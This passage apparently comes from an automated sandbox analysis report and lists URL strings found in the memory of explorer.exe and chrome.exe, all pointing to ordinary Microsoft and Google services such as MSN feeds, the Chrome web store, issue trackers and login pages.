          Source: explorer.exe, 00000002.00000003.3112104349.0000000009701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6283803377.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1818187033.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
          Source: explorer.exe, 00000002.00000000.1812586501.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
          Source: explorer.exe, 00000002.00000000.1818187033.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6282433377.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3112104349.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1812586501.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
          Source: explorer.exe, 00000002.00000003.3112104349.0000000009701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6283803377.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1818187033.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
          Source: explorer.exe, 00000002.00000000.1812586501.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
          Source: explorer.exe, 00000002.00000000.1812586501.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
          Source: explorer.exe, 00000002.00000000.1812586501.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
          Source: explorer.exe, 00000002.00000000.1812586501.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
          Source: explorer.exe, 00000002.00000000.1812586501.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
          Source: explorer.exe, 00000002.00000000.1812586501.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
          Source: explorer.exe, 00000002.00000000.1812586501.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
          Source: explorer.exe, 00000002.00000000.1812586501.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
          Source: explorer.exe, 00000002.00000000.1812586501.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
          Source: explorer.exe, 00000002.00000000.1812586501.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
          Source: explorer.exe, 00000002.00000000.1812586501.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
          Source: explorer.exe, 00000002.00000000.1812586501.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
          Source: chrome.exe, 00000011.00000000.2352347416.00005D400032C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
          Source: chrome.exe, 0000000E.00000000.2166233084.0000282400888000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2228722898.00005B8000880000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.4950312388.00005B8000874000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2522643680.00005B8000880000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000010.00000000.2292864737.00007B6400884000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.2353438336.00005D400087C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore206E5CBCC42ABED43A4B58FE3810E62AFFA010EB0349Fbehavior:imprivata_lo
          Source: chrome.exe, 0000000F.00000000.2230528394.00005B8000D98000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
          Source: chrome.exe, 00000011.00000000.2352547010.00005D4000388000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreBD8781D757D830FC2E85470A1B6E8A718B7EE0D94F25792AF1AA7483936DE29C07
          Source: chrome.exe, 0000000F.00000000.2228669371.00005B8000869000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2228722898.00005B8000874000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000010.00000000.2292761880.00007B640086A000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2498912599.00007B640086C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.2352347416.00005D400032C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
          Source: chrome.exe, 00000011.00000000.2353438336.00005D400087C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstorepX
          Source: chrome.exe, 00000011.00000000.2349878535.00000230670D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/
          Source: chrome.exe, 00000011.00000000.2349878535.00000230670D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
          Source: chrome.exe, 0000000C.00000000.2039431029.0000026F340F0000.00000002.00000001.00040000.00000000.sdmp, chrome.exe, 0000000D.00000000.2100480488.00000226A4700000.00000002.00000001.00040000.00000000.sdmp, chrome.exe, 0000000E.00000000.2163045580.000001DE96790000.00000002.00000001.00040000.00000000.sdmp, chrome.exe, 0000000F.00000000.2222625325.0000026A53FC0000.00000002.00000001.00040000.00000000.sdmp, chrome.exe, 00000010.00000000.2288282257.0000026627F70000.00000002.00000001.00040000.00000000.sdmp, chrome.exe, 00000011.00000000.2349878535.00000230670D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/(
          Source: chrome.exe, 0000000C.00000000.2039431029.0000026F340F0000.00000002.00000001.00040000.00000000.sdmp, chrome.exe, 0000000D.00000000.2100480488.00000226A4700000.00000002.00000001.00040000.00000000.sdmp, chrome.exe, 0000000E.00000000.2163045580.000001DE96790000.00000002.00000001.00040000.00000000.sdmp, chrome.exe, 0000000F.00000000.2222625325.0000026A53FC0000.00000002.00000001.00040000.00000000.sdmp, chrome.exe, 00000010.00000000.2288282257.0000026627F70000.00000002.00000001.00040000.00000000.sdmp, chrome.exe, 00000011.00000000.2349878535.00000230670D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/(TrustTokenOperationsRequiringOriginTrial#all-operat
          Source: chrome.exe, 0000000E.00000000.2164729799.000028240025C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2227182415.00005B800025C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000010.00000000.2291060744.00007B640025C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.2351971449.00005D400025C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/
          Source: chrome.exe, 0000000E.00000000.2164729799.000028240025C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2227182415.00005B800025C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000010.00000000.2291060744.00007B640025C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.2351971449.00005D400025C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/6EAED1924DB611B6EEF2A664BD077BE7EAD33B8F4EB74897CB187C7633357C2FE8
          Source: chrome.exe, 0000000E.00000000.2166582826.000028240093C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2229105493.00005B800092C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/
          Source: chrome.exe, 00000011.00000000.2351942407.00005D4000244000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
          Source: chrome.exe, 00000010.00000000.2288826726.0000026F00242000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000010.00000000.2293580844.00007B640098C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/1297276
          Source: chrome.exe, 00000010.00000000.2288826726.0000026F00242000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000010.00000000.2293580844.00007B640098C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/1309302
          Source: chrome.exe, 0000000F.00000000.2231564849.00005B800120C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
          Source: explorer.exe, 00000002.00000000.1821307110.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: chrome.exe, 0000000F.00000000.2231002142.00005B80010B8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2442467093.00005B80010B8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://gle.com/uploadby
          Source: chrome.exe, 00000011.00000000.2349878535.00000230670D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
          Source: chrome.exe, 00000011.00000000.2349878535.00000230670D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
          Source: chrome.exe, 0000000E.00000000.2166582826.000028240093C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2229105493.00005B800092C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://google.com/
          Source: chrome.exe, 0000000F.00000000.2229105493.00005B800092C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://google.com/googleapis.com
          Source: explorer.exe, 00000002.00000000.1812586501.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
          Source: explorer.exe, 00000002.00000000.1812586501.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
          Source: explorer.exe, 00000002.00000000.1812586501.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
          Source: explorer.exe, 00000002.00000000.1812586501.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
          Source: explorer.exe, 00000002.00000000.1812586501.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
          Source: explorer.exe, 00000002.00000000.1812586501.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
          Source: explorer.exe, 00000002.00000000.1812586501.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
          Source: chrome.exe, 0000000C.00000000.2045101881.00006A1400274000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2044986567.00006A1400250000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045485184.00006A14002DC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2044117522.00006A1400108000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2044760096.00006A140020C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/161903006
          Source: chrome.exe, 0000000C.00000000.2044117522.00006A1400108000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/1619030060
          Source: chrome.exe, 0000000C.00000000.2045101881.00006A1400274000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2044986567.00006A1400250000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045485184.00006A14002DC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2044117522.00006A1400108000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2044760096.00006A140020C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097
          Source: chrome.exe, 0000000C.00000000.2044117522.00006A1400108000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097P
          Source: chrome.exe, 0000000C.00000000.2044117522.00006A1400108000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2044760096.00006A140020C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/184850002
          Source: chrome.exe, 0000000C.00000000.2044117522.00006A1400108000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045197719.00006A1400294000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2044760096.00006A140020C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/187425444
          Source: chrome.exe, 0000000C.00000000.2044343181.00006A1400150000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2044760096.00006A140020C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
          Source: chrome.exe, 0000000C.00000000.2044760096.00006A140020C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903enableTranslatedShaderSubstitution
          Source: chrome.exe, 0000000C.00000000.2044117522.00006A1400108000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2044760096.00006A140020C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/229267970
          Source: chrome.exe, 0000000C.00000000.2044986567.00006A1400250000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045485184.00006A14002DC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045197719.00006A1400294000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2044760096.00006A140020C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/250706693
          Source: chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/250706693absEnable
          Source: chrome.exe, 0000000C.00000000.2045101881.00006A1400274000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2044986567.00006A1400250000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045485184.00006A14002DC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2044117522.00006A1400108000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2044760096.00006A140020C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366
          Source: chrome.exe, 0000000C.00000000.2044117522.00006A1400108000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366ePreperiod
          Source: chrome.exe, 0000000C.00000000.2045101881.00006A1400274000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366pressedFormats
          Source: chrome.exe, 0000000C.00000000.2045197719.00006A1400294000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2044760096.00006A140020C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/255411748
          Source: chrome.exe, 0000000C.00000000.2045101881.00006A1400274000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2044986567.00006A1400250000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045485184.00006A14002DC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2044117522.00006A1400108000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2044760096.00006A140020C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/258207403
          Source: chrome.exe, 0000000C.00000000.2044760096.00006A140020C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/258207403enable
          Source: chrome.exe, 0000000C.00000000.2045101881.00006A1400274000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2044986567.00006A1400250000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045485184.00006A14002DC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2044117522.00006A1400108000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2044760096.00006A140020C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/274859104
          Source: chrome.exe, 0000000C.00000000.2044986567.00006A1400250000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045485184.00006A14002DC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2044117522.00006A1400108000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045197719.00006A1400294000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2044760096.00006A140020C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
          Source: chrome.exe, 0000000C.00000000.2044117522.00006A1400108000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263d
          Source: chrome.exe, 0000000C.00000000.2043715753.00006A1400024000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045352499.00006A14002B0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2044955111.00006A1400240000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/issues/166475273
          Source: chrome.exe, 00000011.00000000.2349878535.00000230670D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2
          Source: chrome.exe, 0000000C.00000000.2039431029.0000026F340F0000.00000002.00000001.00040000.00000000.sdmp, chrome.exe, 0000000D.00000000.2100480488.00000226A4700000.00000002.00000001.00040000.00000000.sdmp, chrome.exe, 0000000E.00000000.2163045580.000001DE96790000.00000002.00000001.00040000.00000000.sdmp, chrome.exe, 0000000F.00000000.2222625325.0000026A53FC0000.00000002.00000001.00040000.00000000.sdmp, chrome.exe, 00000010.00000000.2288282257.0000026627F70000.00000002.00000001.00040000.00000000.sdmp, chrome.exe, 00000011.00000000.2349878535.00000230670D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard
          Source: chrome.exe, 0000000C.00000000.2039431029.0000026F340F0000.00000002.00000001.00040000.00000000.sdmp, chrome.exe, 0000000D.00000000.2100480488.00000226A4700000.00000002.00000001.00040000.00000000.sdmp, chrome.exe, 0000000E.00000000.2163045580.000001DE96790000.00000002.00000001.00040000.00000000.sdmp, chrome.exe, 0000000F.00000000.2222625325.0000026A53FC0000.00000002.00000001.00040000.00000000.sdmp, chrome.exe, 00000010.00000000.2288282257.0000026627F70000.00000002.00000001.00040000.00000000.sdmp, chrome.exe, 00000011.00000000.2349878535.00000230670D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard#exps-registration-success-page-urls
          Source: chrome.exe, 0000000C.00000000.2039431029.0000026F340F0000.00000002.00000001.00040000.00000000.sdmp, chrome.exe, 0000000D.00000000.2100480488.00000226A4700000.00000002.00000001.00040000.00000000.sdmp, chrome.exe, 0000000E.00000000.2163045580.000001DE96790000.00000002.00000001.00040000.00000000.sdmp, chrome.exe, 0000000F.00000000.2222625325.0000026A53FC0000.00000002.00000001.00040000.00000000.sdmp, chrome.exe, 00000010.00000000.2288282257.0000026627F70000.00000002.00000001.00040000.00000000.sdmp, chrome.exe, 00000011.00000000.2349878535.00000230670D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardPi
          Source: chrome.exe, 00000011.00000000.2349878535.00000230670D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiments
          Source: chrome.exe, 0000000F.00000003.5620054813.000003C600542000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2231564849.00005B800120C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/upload
          Source: chrome.exe, 0000000F.00000003.5620054813.000003C600542000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2231564849.00005B800120C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/uploadbyurl
          Source: chrome.exe, 0000000F.00000003.5620054813.000003C600542000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2231564849.00005B800120C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2222625325.0000026A53FC0000.00000002.00000001.00040000.00000000.sdmp, chrome.exe, 00000010.00000000.2288282257.0000026627F70000.00000002.00000001.00040000.00000000.sdmp, chrome.exe, 00000011.00000000.2349878535.00000230670D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload
          Source: chrome.exe, 0000000C.00000000.2039431029.0000026F340F0000.00000002.00000001.00040000.00000000.sdmp, chrome.exe, 0000000D.00000000.2100480488.00000226A4700000.00000002.00000001.00040000.00000000.sdmp, chrome.exe, 0000000E.00000000.2163045580.000001DE96790000.00000002.00000001.00040000.00000000.sdmp, chrome.exe, 0000000F.00000000.2222625325.0000026A53FC0000.00000002.00000001.00040000.00000000.sdmp, chrome.exe, 00000010.00000000.2288282257.0000026627F70000.00000002.00000001.00040000.00000000.sdmp, chrome.exe, 00000011.00000000.2349878535.00000230670D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload#companion-iph-blocklisted-page-urls
          Source: chrome.exe, 0000000D.00000000.2103127097.00002C3002282000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000D.00000000.2103855990.00002C3002350000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
          Source: chrome.exe, 0000000D.00000003.2496264765.00002C3002344000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.2616568761.00002C3002350000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000D.00000000.2103855990.00002C3002350000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/Qnamespace-82374a30_585a_4672_b664_f0d0f51cee09-https://login.microsoftonline
          Source: chrome.exe, 0000000D.00000000.2102418004.00002C3002254000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/t.com/
          Source: chrome.exe, 0000000D.00000000.2103127097.00002C3002282000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000D.00000000.2103855990.00002C3002350000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/
          Source: chrome.exe, 0000000D.00000003.2496264765.00002C3002344000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/Mnamespace-ff6bd74c_52d9_4769_b984_108ae96a1d99-https://support.mi
          Source: chrome.exe, 0000000D.00000000.2103127097.00002C3002282000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000D.00000000.2103855990.00002C3002350000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://mem.gfx.ms/
          Source: chrome.exe, 0000000F.00000000.2230278633.00005B8000CEC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2223842570.000003C6002C2000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2498436111.00005B8000CEC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://myactivity.google.com/
          Source: chrome.exe, 0000000F.00000000.2229105493.00005B800092C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/
          Source: chrome.exe, 0000000E.00000000.2166689905.0000282400964000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2229196995.00005B800097C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
          Source: chrome.exe, 0000000E.00000000.2166689905.0000282400964000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2229196995.00005B800097C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetokenhttps://www.googleapis.com/reauth/v1beta/use
          Source: chrome.exe, 0000000E.00000000.2165856284.00002824006FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com
          Source: explorer.exe, 00000002.00000000.1821307110.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
          Source: chrome.exe, 0000000F.00000000.2230278633.00005B8000CEC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2223842570.000003C6002C2000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2498436111.00005B8000CEC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
          Source: chrome.exe, 0000000F.00000003.2498754185.00005B800120C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2231564849.00005B800120C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
          Source: chrome.exe, 0000000F.00000000.2223842570.000003C6002C2000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2498436111.00005B8000CEC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://policies.google.com/
          Source: explorer.exe, 00000002.00000000.1821307110.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
          Source: explorer.exe, 00000002.00000000.1812586501.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
          Source: chrome.exe, 0000000F.00000000.2223842570.000003C600302000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?
          Source: chrome.exe, 0000000E.00000000.2166582826.000028240093C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2229105493.00005B800092C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://tasks.googleapis.com/
          Source: chrome.exe, 0000000F.00000000.2229105493.00005B800092C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://tasks.googleapis.com/https://classroom.googleapis.com/
          Source: chrome.exe, 0000000E.00000000.2166582826.000028240093C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://tasks.googleapis.com/https://classroom.googleapis.com/https://oauthaccountmanager.googleapis
          Source: explorer.exe, 00000002.00000000.1812586501.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
